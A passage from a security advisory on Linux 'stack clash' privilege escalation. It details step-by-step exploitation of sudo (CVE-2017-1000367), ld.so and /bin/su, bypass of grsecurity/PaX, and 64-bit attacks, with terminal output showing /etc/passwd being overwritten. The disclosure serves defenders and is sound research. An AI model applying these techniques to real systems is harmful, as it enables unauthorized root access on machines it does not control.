The length of the guard-page jump in gettext() is the length of the
LANGUAGE environment variable (at most 128KB, MAX_ARG_STRLEN): we take a
64KB jump, well within the range of the final heap-stack distance; this
jump then lands into the free chunk at the end of the heap, where the
smashing-chunk will be allocated in Step 4a, with a probability of
(smashing-chunk / (memleak-chunk + DEFAULT_TOP_PAD)).

If available, we assign "C.UTF-8" to the LC_ALL environment variable,
and prepend "be" to our 64KB LANGUAGE environment variable, because
these minimal locales do not interfere with our heap feng-shui.

Step 4a: Smash the stack with the heap

In gettext(), the smashing-chunk (a malloc() and memcpy() of the
OUTPUT_CHARSET environment variable) must be allocated into the free
chunk at the end of the heap, where the stack-frame of memcpy() is also
allocated.

First, if the size of our memleak-chunks is exactly 4KB+8B
(PATH_MAX+MALLOC_ALIGNMENT), then:

- the size of the free chunk at the end of the heap is a random variable
in the [0B,4KB] range;

- the size of the free chunks left over at the end of the 1MB mmap()s is
roughly 1MB%(4KB+8B)=2KB.

Second, if the size of our smashing-chunk is about 2KB+256B
(PATH_MAX/2+NAME_MAX), then:

- it is always larger than (and never allocated into) the free chunks at
the end of the 1MB mmap()s;

- it is smaller than (and allocated into) the free chunk at the end of
the heap with a probability of roughly 1-(2KB+256B)/4KB.

Last, in each level of our directory tree "B", sudo_ttyname_scan()
malloc()ates and realloc()ates an array of pointers to sub-directories,
but these realloc()s prevent the smashing-chunk from being allocated
into the free chunk at the end of the heap:

- they create holes in the heap, where the smashing-chunk may be
allocated to;

- they may allocate the free chunk at the end of the heap, where the
smashing-chunk should be allocated to.

To solve these problems, we carefully calculate the number of
sub-directories in each level of our directory tree "B":

- we limit the size of the realloc()s -- and hence the size of the holes
that they create -- to 4KB+2KB:

. either a memleak-chunk is allocated into such a hole, and the
remainder is smaller than the smashing-chunk ("not a fit");

. or such a hole is not allocated, but it is larger than the largest
free chunk at the end of the heap ("a worse fit");

- we gradually reduce the final size of the realloc()s in the last
levels of our directory tree "B", and hence re-allocate the holes
created in the previous levels.

In theory, on Debian 8.5, the probability of gaining control of eip is
approximately 1/148, the product of:

- (Step 1) the probability of reaching the stack with the heap:
1-3MB/32MB;

- (Step 3) the probability of jumping over the stack guard-page and into
the free chunk at the end of the heap: (2KB+256B) / (4KB+8B + 128KB);

- (Step 4a) the probability of allocating the smashing-chunk into the
free chunk at the end of the heap: 1-(2KB+256B)/4KB.

In practice, on Debian 8.5, this Sudo exploit:

- gains eip control in 1 run out of 200, on average;

- takes 2.8 seconds per run (on a 4GB Virtual Machine);

- has a good chance of obtaining a root-shell after 200 * 2.8 seconds =
9 minutes;

- uses 2GB of memory.

Note: we do not return-into-libc's system() in Step 4a because /bin/sh
may be bash, which drops our escalated root privileges upon execution.
Instead, we:

- either return-into-libc's __gconv_find_shlib() function through
find_module(), which loads this function's argument from -0x20(%ebp);

- or return-into-libc's __libc_dlopen_mode() function through
nss_load_library(), which loads this function's argument from
-0x1c(%ebp);

- search the libc for a relative pathname that contains a slash
character (for example, "./fork.c") and pass its address to
__gconv_find_shlib() or __libc_dlopen_mode();

- symlink() our PIE exploit to this pathname, and let Sudo execute our
_init() constructor as root, upon successful exploitation.

Debian 8.6

Unlike Debian 8.5, Debian 8.6 is not vulnerable to CVE-2016-3672: Sudo's
PIE and libraries are always randomized, even if we set RLIMIT_STACK to
RLIM_INFINITY; the probability of successfully returning-into-libc,
after gaining eip control in Step 4a (Smash), is 1/256.

However, Debian 8.6 is still vulnerable to offset2lib, the minor
weakness in Linux's ASLR that coincidentally affects Step 1 (Clash) of
our stack-clash exploits:

- if we set RLIMIT_STACK to 136MB (MIN_GAP) or less (the default is
8MB), then the initial heap-stack distance (between the start of the
heap and the end of the stack) is minimal, a random variable in the
[96MB,137MB] range;

- instead of allocating 1GB of heap memory and 1GB of stack memory to
clash the stack with the heap, we merely allocate 137MB of heap memory
(directory pathnames from our directory tree "B") and no stack memory.

In theory, on Debian 8.6, the probability of gaining eip control is
1/134 (instead of 1/148 on Debian 8.5) because the growth of the heap is
never blocked by Sudo's libraries; and in practice, this Sudo exploit
takes only 0.15 second per run (instead of 2.8 on Debian 8.5).

Independent exploitation

The vulnerability that we discovered in Sudo's get_process_ttyname()
function for Linux (CVE-2017-1000367) is exploitable independently of
its stack-clash repercussions: through this vulnerability, a local user
can pretend that his tty is any character device on the filesystem, and
after two race conditions, he can pretend that his tty is any file on
the filesystem.

On an SELinux-enabled system, if a user is Sudoer for a command that
does not grant him full root privileges, he can overwrite any file on
the filesystem (including root-owned files) with this command's output,
because relabel_tty() (in src/selinux.c) calls open(O_RDWR|O_NONBLOCK)
on his tty and dup2()s it to the command's stdin, stdout, and stderr.

To exploit this vulnerability, we:

- create a directory "/dev/shm/_tmp" (to work around
/proc/sys/fs/protected_symlinks), and a symlink "/dev/shm/_tmp/_tty"
to a non-existent pty "/dev/pts/57", whose device number is 34873;

- run Sudo through a symlink "/dev/shm/_tmp/ 34873 " that spoofs the
device number of this non-existent pty;

- set the flag CD_RBAC_ENABLED through the command-line option "-r role"
(where "role" can be our current role, for example "unconfined_r");

- monitor our directory "/dev/shm/_tmp" (for an IN_OPEN inotify event)
and wait until Sudo opendir()s it (because sudo_ttyname_dev() cannot
find our non-existent pty in "/dev/pts/");

- SIGSTOP Sudo, call openpty() until it creates our non-existent pty,
and SIGCONT Sudo;

- monitor our directory "/dev/shm/_tmp" (for an IN_CLOSE_NOWRITE inotify
event) and wait until Sudo closedir()s it;

- SIGSTOP Sudo, replace the symlink "/dev/shm/_tmp/_tty" to our
now-existent pty with a symlink to the file that we want to overwrite
(for example "/etc/passwd"), and SIGCONT Sudo;

- control the output of the command executed by Sudo (the output that
overwrites "/etc/passwd"):

. either through a command-specific method;

. or through a general method such as "--\nHELLO\nWORLD\n" (by
default, getopt() prints an error message to stderr if it does not
recognize an option character).

To reliably win the two SIGSTOP races, we preempt the Sudo process: we
setpriority() it to the lowest priority, sched_setscheduler() it to
SCHED_IDLE, and sched_setaffinity() it to the same CPU as our exploit.

[***@localhost ~]$ head -n 8 /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt

[***@localhost ~]$ sudo -l
[sudo] password for john:
...
User john may run the following commands on localhost:
(ALL) /usr/bin/sum

[***@localhost ~]$ ./Linux_sudo_CVE-2017-1000367 /usr/bin/sum $'--\nHELLO\nWORLD\n'
[sudo] password for john:

[***@localhost ~]$ head -n 8 /etc/passwd
/usr/bin/sum: unrecognized option '--
HELLO
WORLD
'
Try '/usr/bin/sum --help' for more information.
ogin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin

========================================================================
IV.1.3. ld.so "hwcap" exploit
========================================================================

"ld.so and ld-linux.so* find and load the shared libraries needed by a
program, prepare the program to run, and then run it." (man ld.so)

Through ld.so, most SUID and SGID binaries on most i386 Linux
distributions are exploitable. For example: Debian 7, 8, 9, 10; Fedora
23, 24, 25; CentOS 5, 6, 7.

Debian 8.5

Step 1: Clash the stack with anonymous mmap()s

The minimal malloc() implementation in ld.so calls mmap(), not brk(), to
obtain memory from the system, and it never calls munmap(). To reach the
start of the stack with anonymous mmap()s, we:

- set RLIMIT_STACK to RLIM_INFINITY and switch from the default top-down
mmap() layout to the legacy bottom-up mmap() layout;

- cover half of the initial mmap-stack distance
(0xC0000000-0x40000000=2GB) with 1GB of stack memory (the maximum
permitted by the kernel's 1/4 limit on the argument and environment
strings);

- cover the other half of this distance with 1GB of anonymous mmap()s,
through multiple LD_AUDIT environment variables that permanently leak
millions of audit_list structures (CVE-2017-1000366) in
process_envvars() and process_dl_audit() (elf/rtld.c).

Step 2: Move the stack-pointer to the start of the stack

To consume the 128KB of initial stack expansion, we simply pass 128KB of
argv[] and envp[] pointers to execve(), as explained in II.3.2.

Step 3: Jump over the stack guard-page and into the anonymous mmap()s

_dl_init_paths() (elf/dl-load.c), which is called by dl_main() after
process_envvars(), alloca()tes llp_tmp, a stack-based buffer large
enough to hold the LD_LIBRARY_PATH environment variable and any
combination of Dynamic String Token (DST) replacement strings. To
calculate the size of llp_tmp, _dl_init_paths() must:

- first, scan LD_LIBRARY_PATH and count all DSTs ($LIB, $PLATFORM, and
$ORIGIN);

- second, multiply the number of DSTs by the length of the longest DST
replacement string (on Debian, $LIB is replaced by the 18-char-long
"lib/i386-linux-gnu", $PLATFORM by "i386" or "i686", and $ORIGIN by
the pathname of the program's directory, for example "/bin" or
"/usr/sbin" -- the longest DST replacement string is usually
"lib/i386-linux-gnu");

- last, add the length of the original LD_LIBRARY_PATH.

Consequently, if LD_LIBRARY_PATH contains many DSTs that are replaced by
the shortest DST replacement string, then llp_tmp is large but not fully
written to, and can be used to jump over the stack guard-page and into
the anonymous mmap()s.

Our ld.so exploits do not use $ORIGIN because it is ignored by several
distributions and glibc versions; for example:

2010-12-09 Andreas Schwab <***@redhat.com>

* elf/dl-object.c (_dl_new_object): Ignore origin of privileged
program.

Index: glibc-2.12-2-gc4ccff1/elf/dl-object.c
===================================================================
--- glibc-2.12-2-gc4ccff1.orig/elf/dl-object.c
+++ glibc-2.12-2-gc4ccff1/elf/dl-object.c
@@ -214,6 +214,9 @@ _dl_new_object (char *realname, const ch
out:
new->l_origin = origin;
}
+ else if (INTUSE(__libc_enable_secure) && type == lt_executable)
+ /* The origin of a privileged program cannot be trusted. */
+ new->l_origin = (char *) -1;

return new;
}

Step 4b: Smash an anonymous mmap() with the stack

Before _dl_init_paths() returns to dl_main() and jumps back from the
anonymous mmap()s into the stack, we overwrite the block of mmap()ed
memory malloc()ated by _dl_important_hwcaps() with the contents of the
stack-based buffer llp_tmp.

- The block of memory malloc()ated by _dl_important_hwcaps() is divided
in two:

. The first part (the "hwcap-pointers") is an array of r_strlenpair
structures that point to the hardware-capability strings stored in
the second part of this memory block.

. The second part (the "hwcap-strings") contains strings of
hardware-capabilities that are appended to the pathnames of trusted
directories, such as "/lib/" and "/lib/i386-linux-gnu/", when
open_path() searches for audit libraries (LD_AUDIT), preload
libraries (LD_PRELOAD), or dependent libraries (DT_NEEDED).

For example, on Debian, when open_path() finds "libc.so.6" in
"/lib/i386-linux-gnu/i686/cmov/", "i686/cmov/" is such a
hardware-capability string.

- To overwrite the block of memory malloc()ated by
_dl_important_hwcaps() with the contents of the stack-based buffer
llp_tmp, we divide our LD_LIBRARY_PATH environment variable in two:

. The first, static part (our "good-write") overwrites the first
hardware-capability string with characters that we do control.

. The second, dynamic part (our "bad-write") overwrites the last
hardware-capability strings with characters that we do not control
(the short DST replacement strings that enlarge llp_tmp and allow us
to jump over the stack guard-page).

If our 16-byte-aligned good-write overwrites the 8-byte-aligned first
hardware-capability string with the 8-byte pattern "/../tmp/", and if we
append the trusted directory "/lib" to our LD_LIBRARY_PATH, then (after
_dl_init_paths() returns to dl_main()):

- dlmopen_doit() tries to load an LD_AUDIT library "a" (our memory leak
from Step 1);

- _dl_map_object() searches for "a" in the trusted directory "/lib" from
our LD_LIBRARY_PATH;

- open_path() finds our library "a" in "/lib//../tmp//../tmp//../tmp/"
because we overwrote the first hardware-capability string with the
pattern "/../tmp/";

- dl_open_worker() executes our library's _init() constructor, as root.

In theory, this exploit's probability of success depends on:

- (event A) the size of rtld_search_dirs.dirs[0], an array of
r_search_path_elem structures that are malloc()ated by
_dl_init_paths() after the _dl_important_hwcaps(), and must be
allocated above the stack (below 0xC0000000), not below the stack
where it would interfere with Steps 3 (Jump) and 4b (Smash):

P(A) = 1 - size of rtld_search_dirs.dirs[0] / max stack randomization

- (event B) the size of the hwcap-pointers and the size of our
good-write, which must overwrite the first hardware-capability string,
but not the first hardware-capability pointer (to this string):

P(B|A) = MIN(size of hwcap-pointers, size of good-write) /
(max stack randomization - size of rtld_search_dirs.dirs[0])

- (event C) the size of the hwcap-strings and the size of our bad-write,
which must not write past the end of hwcap-strings; but we guarantee
that size of hwcap-strings >= size of good-write + size of bad-write:

P(C|B) = 1

In practice, we use the LD_HWCAP_MASK environment variable to maximize
this exploit's probability of success, because:

- the size of the hwcap-pointers -- which act as a cushion that absorbs
the excess of good-write without crashing,

- the size of the hwcap-strings -- which act as a cushion that absorbs
the excess of good-write and bad-write without crashing,

- and the size of rtld_search_dirs.dirs[0],

are all proportional to 2^N, where N is the number of supported
hardware-capabilities that we enable in LD_HWCAP_MASK.

For example, on Debian 8.5, this exploit:

- has a 1/151 probability of success;

- takes 5.5 seconds per run (on a 4GB Virtual Machine);

- has a good chance of obtaining a root-shell after 151 * 5.5 seconds =
14 minutes.

Debian 8.6

Unlike Debian 8.5, Debian 8.6 is not vulnerable to CVE-2016-3672, but
our ld.so "hwcap" exploit is a data-only attack and is not affected by
the ASLR of the libraries and PIEs.

Debian 9 and 10

Unlike Debian 8, Debian 9 and 10 are not vulnerable to offset2lib: if we
set RLIMIT_STACK to RLIM_INFINITY, the libraries are randomized above
the address 0x40000000, but the PIE is randomized above 0x80000000
(instead of 0x40000000 before the offset2lib patch).

Unfortunately, we discovered a vulnerability in the offset2lib patch
(CVE-2017-1000370): if the PIE is execve()d with 1GB of argument or
environment strings (the maximum permitted by the kernel's 1/4 limit)
then the stack occupies the address 0x80000000, and the PIE is mapped
above the address 0x40000000 instead, directly below the libraries.
This vulnerability effectively nullifies the offset2lib patch, and
allows us to reuse our Debian 8 exploit against Debian 9 and 10.

$ ./Linux_offset2lib
Run #1...
CVE-2017-1000370 triggered
40076000-40078000 r-xp 00000000 00:26 25041 /tmp/Linux_offset2lib
40078000-40079000 r--p 00001000 00:26 25041 /tmp/Linux_offset2lib
40079000-4009b000 rw-p 00002000 00:26 25041 /tmp/Linux_offset2lib
4009b000-400c0000 r-xp 00000000 fd:00 8463588 /usr/lib/ld-2.24.so
400c0000-400c1000 r--p 00024000 fd:00 8463588 /usr/lib/ld-2.24.so
400c1000-400c2000 rw-p 00025000 fd:00 8463588 /usr/lib/ld-2.24.so
400c2000-400c4000 r--p 00000000 00:00 0 [vvar]
400c4000-400c6000 r-xp 00000000 00:00 0 [vdso]
400c6000-400c8000 rw-p 00000000 00:00 0
400cf000-402a3000 r-xp 00000000 fd:00 8463595 /usr/lib/libc-2.24.so
402a3000-402a4000 ---p 001d4000 fd:00 8463595 /usr/lib/libc-2.24.so
402a4000-402a6000 r--p 001d4000 fd:00 8463595 /usr/lib/libc-2.24.so
402a6000-402a7000 rw-p 001d6000 fd:00 8463595 /usr/lib/libc-2.24.so
402a7000-402aa000 rw-p 00000000 00:00 0
7fcf1000-bfcf2000 rw-p 00000000 00:00 0 [stack]

Caveats

- On Fedora and CentOS, this ld.so "hwcap" exploit fails against
/usr/bin/passwd and /usr/bin/chage (but it works against all other
SUID-root binaries) because of SELinux:

type=AVC msg=audit(1492091008.983:414): avc: denied { execute } for pid=2169 comm="passwd" path="/var/tmp/a" dev="dm-0" ino=12828063 scontext=unconfined_u:unconfined_r:passwd_t:s0-s0:c0.c1023 tcontext=unconfined_u:object_r:user_tmp_t:s0 tclass=file permissive=0

type=AVC msg=audit(1492092997.581:487): avc: denied { execute } for pid=2648 comm="chage" path="/var/tmp/a" dev="dm-0" ino=12828063 scontext=unconfined_u:unconfined_r:passwd_t:s0-s0:c0.c1023 tcontext=unconfined_u:object_r:user_tmp_t:s0 tclass=file permissive=0

- It fails against recent versions of Sudo that specify an RPATH such as
"/usr/lib/sudo": _dl_map_object() first searches for our LD_AUDIT
library in RPATH, but open_path() fails to find our library in
"/usr/lib/sudo//../tmp/" and crashes as soon as it reaches an
overwritten hwcap-pointer.

This problem can be solved by a 16-byte pattern "///../../../tmp/"
(instead of the 8-byte pattern "/../tmp/") but the exploit's
probability of success would be divided by two.

- On Ubuntu, this ld.so "hwcap" exploit always fails, because of the
following patch:

Description: pro-actively disable LD_AUDIT for setuid binaries, regardless
of where the libraries are loaded from. This is to try to make sure that
CVE-2010-3856 cannot sneak back in. Upstream is unlikely to take this,
since it limits the functionality of LD_AUDIT.
Author: Kees Cook <***@ubuntu.com>

Index: eglibc-2.15/elf/rtld.c
===================================================================
--- eglibc-2.15.orig/elf/rtld.c 2012-05-09 10:05:29.456899131 -0700
+++ eglibc-2.15/elf/rtld.c 2012-05-09 10:38:53.952009069 -0700
@@ -2529,7 +2529,7 @@
while ((p = (strsep) (&str, ":")) != NULL)
if (p[0] != '\0'
&& (__builtin_expect (! __libc_enable_secure, 1)
- || strchr (p, '/') == NULL))
+ ))
{
/* This is using the local malloc, not the system malloc. The
memory can never be freed. */

========================================================================
IV.1.4. ld.so ".dynamic" exploit
========================================================================

To exploit ld.so without the LD_AUDIT memory leak, we rely on a second
vulnerability that we discovered in the offset2lib patch
(CVE-2017-1000371):

if we set RLIMIT_STACK to RLIM_INFINITY, and allocate nearly 1GB of
stack memory (the maximum permitted by the kernel's 1/4 limit on the
argument and environment strings) then the stack grows down to almost
0x80000000, and because the PIE is mapped above 0x80000000, the minimum
distance between the end of the PIE's read-write segment and the start
of the stack is 4KB (the stack guard-page).

$ ./Linux_offset2lib 0x3f800000
Run #1...
Run #2...
Run #3...
...
Run #796...
Run #797...
Run #798...
CVE-2017-1000371 triggered
4007b000-400a0000 r-xp 00000000 fd:00 8463588 /usr/lib/ld-2.24.so
400a0000-400a1000 r--p 00024000 fd:00 8463588 /usr/lib/ld-2.24.so
400a1000-400a2000 rw-p 00025000 fd:00 8463588 /usr/lib/ld-2.24.so
400a2000-400a4000 r--p 00000000 00:00 0 [vvar]
400a4000-400a6000 r-xp 00000000 00:00 0 [vdso]
400a6000-400a8000 rw-p 00000000 00:00 0
400af000-40283000 r-xp 00000000 fd:00 8463595 /usr/lib/libc-2.24.so
40283000-40284000 ---p 001d4000 fd:00 8463595 /usr/lib/libc-2.24.so
40284000-40286000 r--p 001d4000 fd:00 8463595 /usr/lib/libc-2.24.so
40286000-40287000 rw-p 001d6000 fd:00 8463595 /usr/lib/libc-2.24.so
40287000-4028a000 rw-p 00000000 00:00 0
8000a000-8000c000 r-xp 00000000 00:26 25041 /tmp/Linux_offset2lib
8000c000-8000d000 r--p 00001000 00:26 25041 /tmp/Linux_offset2lib
8000d000-8002f000 rw-p 00002000 00:26 25041 /tmp/Linux_offset2lib
80030000-bf831000 rw-p 00000000 00:00 0 [heap]

Note: in this example, the "[stack]" is incorrectly displayed as the
"[heap]" by show_map_vma() (in fs/proc/task_mmu.c).

This completes Step 1: we clash the stack with the PIE's read-write
segment; we complete the remaining steps as in the "hwcap" exploit:

- Step 2: we consume the initial stack expansion with 128KB of argv[]
and envp[] pointers;

- Step 3: we jump over the stack guard-page and into the PIE's
read-write segment with llp_tmp's alloca() (in _dl_init_paths());

- Step 4b: we smash the PIE's read-write segment with llp_tmp's
good-write and bad-write (in _dl_init_paths()); we can smash the
following sections:

+ .data and .bss: but we discarded this application-specific approach;

+ .got: although protected by Full RELRO (Full RELocate Read-Only,
GNU_RELRO and BIND_NOW) the .got is still writable when we smash it
in _dl_init_paths(); however, within ld.so, the .got is written to
but never read from, and we therefore discarded this approach;

+ .dynamic: our favored approach.

On i386, the .dynamic section is an array of Elf32_Dyn structures (an
int32 d_tag, and the union of uint32 d_val and uint32 d_ptr) that
contains entries such as:

- DT_STRTAB, a pointer to the PIE's .dynstr section (a read-only string
table): its d_tag (DT_STRTAB) is read (by elf_get_dynamic_info())
before we smash it in _dl_init_paths(), but its d_ptr is read (by
_dl_map_object_deps()) after we smash it in _dl_init_paths();

- DT_NEEDED, an offset into the .dynstr section: the pathname of a
dependent library that must be loaded by _dl_map_object_deps().

If we overwrite the entire .dynamic section with the following 8-byte
pattern (an Elf32_Dyn structure):

- a DT_NEEDED d_tag,

- a d_val equal to half the address of our own string table on the stack
(16MB of argument strings, enough to defeat the 8MB stack
randomization),

then _dl_map_object_deps() reads the pathname of this dependent library
from DT_STRTAB.d_ptr + DT_NEEDED.d_val = our_strtab/2 + our_strtab/2 =
our_strtab, and loads our own library, as root. This 8-byte pattern is
simple, but poses two problems:

- DT_NEEDED is an int32 equal to 1, but we smash the .dynamic section
with a string copy that cannot contain null-bytes: to solve this first
problem we use DT_AUXILIARY instead, which is equivalent but equal to
0x7ffffffd;

- ld.so crashes before it returns from dl_main() (before it calls
_dl_init() and executes our library's _init() constructor):

. in _dl_map_object_deps() because of our DT_AUXILIARY entry;

. in version_check_doit() because we overwrote the DT_VERNEED entry;

. in _dl_relocate_object() because we overwrote the DT_REL, DT_RELSZ,
and DT_RELCOUNT entries.

To solve this second problem, we could overwrite the .dynamic section
with a more complicated pattern that repairs these entries, but our
exploit's probability of success would decrease significantly.

Instead, we take control of ld.so's execution flow as soon as
_dl_map_object_deps() loads our library:

- our library contains three executable LOAD segments,

- but only the first and last segments are sanity-checked by
_dl_map_object_from_fd() and _dl_map_segments(),

- and all segments except the first are mmap()ed with MAP_FIXED by
_dl_map_segments(),

- so we can mmap() our second segment anywhere -- we mmap() it on top of
ld.so's executable segment,

- and return into our own code (instead of ld.so's) as soon as this
second mmap() system-call returns.

Probabilities

The "hwcap" exploit taught us that this ".dynamic" exploit's probability
of success depends on:

- the size of the cushion below the .dynamic section, which can absorb
the excess of "good-write" without crashing: the padding bytes between
the start of the PIE's read-write segment and the start of its first
read-write section;

- the size of the cushion above the .dynamic section, which can absorb
the excess of "good-write" and "bad-write" without crashing: the .got,
.data, and .bss sections.

If we guarantee that (cushion above .dynamic > good-write + bad-write),
then the theoretical probability of success is approximately:

MIN(cushion below .dynamic, good-write) / max stack randomization

The maximum size of the cushion below the .dynamic section is 4KB (one
page) and hence the maximum probability of success is 4KB/8MB=1/2048.
In practice, on Ubuntu 16.04.2:

- the highest probability is 1/2589 (/bin/su) and the lowest probability
is 1/9225 (/usr/lib/eject/dmcrypt-get-device);

- each run uses 1GB of memory and takes 1.5 seconds (on a 4GB Virtual
Machine);

- this ld.so ".dynamic" exploit has a good chance of obtaining a
root-shell after 2589 * 1.5 seconds ~= 1 hour.

========================================================================
IV.1.5. /bin/su
========================================================================

As we were drafting this advisory, we discovered a general method for
completing Step 1 (Clash) of the stack-clash exploitation: the Linux
kernel limits the size of the command-line arguments and environment
variables to 1/4 of the RLIMIT_STACK, but it imposes this limit on the
argument and environment strings, not on the argv[] and envp[] pointers
to these strings (CVE-2017-1000365).

On i386, if we set RLIMIT_STACK to RLIM_INFINITY, the maximum number of
argv[] and envp[] pointers is 1G (1/4 of the RLIMIT_STACK, divided by
1B, the minimum size of an argument or environment string). In theory,
the maximum size of the initial stack is therefore 1G*(1B+4B)=5GB. In
practice, this would exhaust the address-space and allows us to clash
the stack with the memory region that is mapped below, without an
application-specific memory leak.

This discovery allowed us to write alternative versions of our
stack-clash exploits; for example:

- an ld.so "hwcap" exploit against Ubuntu: we replace the LD_AUDIT
memory leak with 2GB of stack memory (1GB of argument and environment
strings, and 1GB of argv[] and envp[] pointers) and replace the
LD_AUDIT library with an LD_PRELOAD library;

- an ld.so ".dynamic" exploit against systems vulnerable to offset2lib:
we reach the end of the PIE's read-write segment with only 128MB of
stack memory (argument and environment strings and pointers).

These proofs-of-concept demonstrate a general method for completing Step
1 (Clash), but they are much slower than their original versions (10-20
seconds per run) because they pass millions of argv[] and envp[]
pointers to execve().

Moreover, this discovery allowed us to exploit SUID binaries through
general methods that do not depend on application-specific or ld.so
vulnerabilities; if a SUID binary calls setlocale(LC_ALL, ""); and
gettext() (or a derivative such as strerror() or _()), then it is
exploitable:

- Step 1: we clash the stack with the heap through millions of argument
and environment strings and pointers;

- Step 2: we consume the initial stack expansion with 128KB of argument
and environment pointers;

- Step 3: we jump over the stack guard-page and into the heap with the
alloca()tion of the LANGUAGE environment variable in gettext();

- Step 4a: we smash the stack with the malloc()ation of the
OUTPUT_CHARSET environment variable in gettext() and thus gain control
of eip.

For example, we exploited Debian's /bin/su (from the shadow-utils): its
main() function calls setlocale() and save_caller_context(), which calls
gettext() (through _()) if its stdin is not a tty.

Debian 8.5

Debian 8.5 is vulnerable to CVE-2016-3672: we set RLIMIT_STACK to
RLIM_INFINITY and disable ASLR, clash the stack with the heap through
2GB of argument and environment strings and pointers (1GB of strings,
1GB of pointers), and return-into-libc's system() or __libc_dlopen():

- the system() version uses 4GB of memory (2GB in the /bin/su process,
and 2GB in the process fork()ed by system());

- the __libc_dlopen() version uses only 2GB of memory, but ebp must
point to our smashed data on the stack.

Debian 8.6

Debian 8.6 is vulnerable to offset2lib but not to CVE-2016-3672: we must
brute-force the libc's ASLR (8 bits of entropy), but we clash the stack
with the heap through only 128MB of argument and environment strings and
pointers -- this /bin/su exploit can be parallelized.

========================================================================
IV.1.6. Grsecurity/PaX
========================================================================

https://grsecurity.net/

In 2010, grsecurity/PaX introduced a configurable stack guard-page: its
size can be modified through /proc/sys/vm/heap_stack_gap and is 64KB by
default (unlike the hard-coded 4KB stack guard-page in the vanilla
kernel).

Unfortunately, a 64KB stack guard-page is not large enough, and can be
jumped over with ld.so or gettext() (CVE-2017-1000377); for example, we
were able to gain eip control against Sudo, but we were unable to obtain
a root-shell or gain eip control against another application, because
grsecurity/PaX imposes the following security measures:

- it restricts the RLIMIT_STACK of SUID binaries to 8MB, which prevents
us from switching to the legacy bottom-up mmap() layout (Step 1);

- it restricts the argument and environment strings to 512KB, which
prevents us from clashing the stack through megabytes of command-line
arguments and environment variables (Step 1);

- it randomizes the PIE and libraries with 16 bits of entropy (instead
of 8 bits in vanilla), which prevents us from brute-forcing the ASLR
and returning-into-libc (Step 4a);

- it implements /proc/sys/kernel/grsecurity/deter_bruteforce (enabled by
default), which limits the number of SUID crashes to 1 every 15
minutes (all Steps) and makes exploitation impossible.

Sudo

The vulnerability that we discovered in Sudo's get_process_ttyname()
(CVE-2017-1000367) allows us to:

- Step 1: clash the stack with 3GB of heap memory from the filesystem
(directory pathnames) and bypass grsecurity/PaX's 512KB limit on the
argument and environment strings;

- Step 2: consume the 128KB of initial stack expansion with 3MB of
recursive function calls and avoid grsecurity/PaX's 8MB restriction on
the RLIMIT_STACK;

- Step 3: jump over grsecurity/PaX's 64KB stack guard-page with a 128KB
(MAX_ARG_STRLEN) alloca()tion of the LANGUAGE environment variable in
gettext();

- Step 4a: smash the stack with a 128KB (MAX_ARG_STRLEN) malloc()ation
of the OUTPUT_CHARSET environment variable in gettext() -- the
"smashing-chunk" -- and thus gain control of eip.

In Step 1, we nearly exhaust the address-space until finally malloc()
switches from brk() to 1MB mmap()s and reaches the start of the stack
with the very last 1MB mmap() that we allocate. The exact amount of
memory that we must allocate to reach the stack with our last 1MB mmap()
depends on the sum of three random variables: the 256MB randomization of
the stack, the 64MB randomization of the heap, and the 1MB randomization
of the NULL region.

To maximize the probability of jumping over the stack guard-page, into
our last 1MB mmap() below the stack, and overwriting a return-address on
the stack with our smashing-chunk:

- (Step 1) we must allocate the mean amount of memory to reach the stack
with our last 1MB mmap(): the sum of three uniform random variables is
not uniform (https://en.wikipedia.org/wiki/Irwin-Hall_distribution),
but the values within the 256MB-64MB-1MB=191MB plateau at the center
of this bell-shaped probability distribution occur with a uniform and
maximum probability of (1MB*64MB)/(1MB*64MB*256MB)=1/256MB;

- (Step 1) the end of our last 1MB mmap() must be allocated at a
distance within [stack guard-page (64KB), guard-page jump (128KB)]
below the start of the stack: the guard-page jump (Step 3) then lands
at a distance d within [0, guard-page jump - stack guard-page (64KB)]
below the end of our last 1MB mmap();

- (Step 4a) the end of our smashing-chunk must be allocated at the end
of our last 1MB mmap(), above the landing-point of the guard-page
jump: our smashing-chunk then overwrites a return-address on the
stack, below the landing-point of the guard-page jump.

In theory, this probability is roughly:

SUM(d = 1; d < guard-page jump - stack guard-page; d++) d / (256MB*1MB)

~= ((guard-page jump - stack guard-page)^2 / 2) / (256MB*1MB)

~= 1 / 2^17

In practice, we tested this Sudo proof-of-concept on an i386 Debian 8.6
protected by the linux-grsec package from the jessie-backports, but we
manually disabled /proc/sys/kernel/grsecurity/deter_bruteforce:

- it uses 3GB of memory, and 800K on-disk inodes;

- it takes 5.5 seconds per run (on a 4GB Virtual Machine);

- it has a good chance of gaining eip control after 2^17 * 5.5 seconds =
200 hours; in our test:

PAX: From 192.168.56.1: execution attempt in: <heap>, 1b068000-a100d000 1b068000
PAX: terminating task: /usr/bin/sudo( 1 ):25465, uid/euid: 1000/0, PC: 41414141, SP: b8844f30
PAX: bytes at PC: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
PAX: bytes at SP-4: 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141

However, brute-forcing the ASLR to obtain a root-shell would take ~1500
years and makes exploitation impossible.

Moreover, if we enable /proc/sys/kernel/grsecurity/deter_bruteforce,
gaining eip control would take ~1365 days, and obtaining a root-shell
would take thousands of years.

========================================================================
IV.1.7. 64-bit exploitation
========================================================================

Introduction

The address-space of a 64-bit process is so vast that we initially
thought it was impossible to clash the stack with another memory region;
we were wrong.

Linux's execve() first randomizes the end of the mmap region (which
grows top-down by default) and then randomizes the end of the stack
region (which grows down, on x86). On amd64, the initial mmap-stack
distance (between the end of the mmap region and the end of the stack
region) is minimal when RLIMIT_STACK is lower than or equal to MIN_GAP
(mmap_base() in arch/x86/mm/mmap.c), and then:

- the end of the mmap region is equal to (as calculated by
arch_pick_mmap_layout() in arch/x86/mm/mmap.c):

mmap_end = TASK_SIZE - MIN_GAP - arch_mmap_rnd()

where:

